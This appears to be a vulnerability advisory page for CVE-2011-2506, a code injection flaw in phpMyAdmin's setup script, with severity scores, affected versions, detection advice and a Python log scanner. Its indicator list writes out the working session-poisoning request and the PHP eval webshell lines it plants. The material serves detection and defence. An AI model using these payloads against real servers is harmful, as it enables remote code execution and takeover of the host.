CVE-2011-2506
published 2011-07-14


Priority: P355 high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 9.63% (94.9th percentile)
setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not properly restrict the presence of comment closing delimiters, which allows remote attackers to conduct static code injection attacks by leveraging the ability to modify the SESSION superglobal array.

Affected

41 ranges · showing 25
Vendor | Product | Version range | Fixed in
debian | phpmyadmin | < phpmyadmin 4:3.4.3.1-1 (bookworm) | phpmyadmin 4:3.4.3.1-1 (bookworm)
phpmyadmin | phpmyadmin | |

Detection & IOCs (extracted from sources)

path: setup/lib/ConfigGenerator.class.php
path: /setup/config.php
path: /config/config.inc.php
url: /?_SESSION[ConfigFile][Servers][*/foreach($_GET as $k=>$v)if($k==="eval")eval($v);/*][port]=0&session_to_unset=x&token=<token>
command: foreach($_GET as $k=>$v)if($k==="eval")eval($v);
hash: 202cb962ac59075b964b07152d234b70
command: eval(getenv('HTTP_CODE'));
  • Detect exploitation attempts by monitoring HTTP requests containing '_SESSION[ConfigFile][Servers][*/' in the query string, which is the session poisoning vector used to inject PHP code between comment delimiters.
  • Alert on POST requests to /setup/config.php with the parameter 'submit_save=Save', which triggers writing the injected code to the config file on disk.
  • Alert on GET requests to /config/config.inc.php with an 'eval' query parameter, which is the webshell execution step after successful code injection.
  • Presence of the MD5 hash 202cb962ac59075b964b07152d234b70 (md5(123)) in HTTP responses from /config/config.inc.php is a reliable indicator of successful code injection exploitation.
  • Monitor for creation or modification of the file config/config.inc.php within the phpMyAdmin web root, as the exploit writes injected PHP code to this path.
  • The exploit requires the 'config' directory to be web-server writable; absence of this directory causes the exploit to abort. Monitor for creation of this directory as a pre-exploitation indicator.
  • Exploitation requires the web server to have write access to the 'config/' subdirectory within the phpMyAdmin installation. If this directory does not exist or is not writable, the exploit will fail.
  • Affected versions are phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1; versions at or above these are patched.
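
The three HTTP indicators listed above, applied to web-server access-log lines. This is an added example, not code from the page's sources; the log lines, addresses, rule names and the PAYLOAD and TOKEN placeholders are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
POISON_MARKER = "_SESSION[ConfigFile][Servers][*/"

# Constructed sample log lines (documentation addresses, placeholder payloads).
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Jul/2011:10:00:01 +0000] "GET /phpmyadmin/?_SESSION%5BConfigFile%5D%5BServers%5D%5B%2A%2FPAYLOAD%2F%2A%5D%5Bport%5D=0&session_to_unset=x&token=TOKEN HTTP/1.1" 200 512',
    '198.51.100.7 - - [14/Jul/2011:10:00:02 +0000] "POST /phpmyadmin/setup/config.php HTTP/1.1" 302 0',
    '198.51.100.7 - - [14/Jul/2011:10:00:03 +0000] "GET /phpmyadmin/config/config.inc.php?eval=PAYLOAD HTTP/1.1" 200 32',
    '192.0.2.10 - - [14/Jul/2011:10:00:04 +0000] "GET /phpmyadmin/index.php?db=shop HTTP/1.1" 200 4096',
]

def classify(line):
    """Return the set of CVE-2011-2506 indicators matched by one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return set()
    method = m.group("method")
    url = urlsplit(m.group("target"))
    path = unquote(url.path)
    query = unquote(url.query)  # decode so %5B and %2A%2F forms still match
    hits = set()
    if POISON_MARKER in query:
        hits.add("session_poisoning")
    # submit_save=Save travels in the POST body, which access logs do not
    # record, so this rule keys on method and path only.
    if method == "POST" and path.endswith("/setup/config.php"):
        hits.add("setup_save_post")
    has_eval = "eval" in parse_qs(url.query, keep_blank_values=True)
    if method == "GET" and path.endswith("/config/config.inc.php") and has_eval:
        hits.add("webshell_request")
    return hits

def scan(lines):
    """Return (line index, sorted indicators) for every line that matches."""
    results = ((i, sorted(classify(line))) for i, line in enumerate(lines))
    return [r for r in results if r[1]]

if __name__ == "__main__":
    for index, indicators in scan(SAMPLE_LOG):
        print(index, indicators)
```

All three indicators from one client within a short window is a stronger signal than any single hit, since a POST to the setup script alone also occurs during legitimate configuration.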

CVSS provenance

nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P
osv | 7.5 | HIGH
vendor_debian | 7.5 | LOW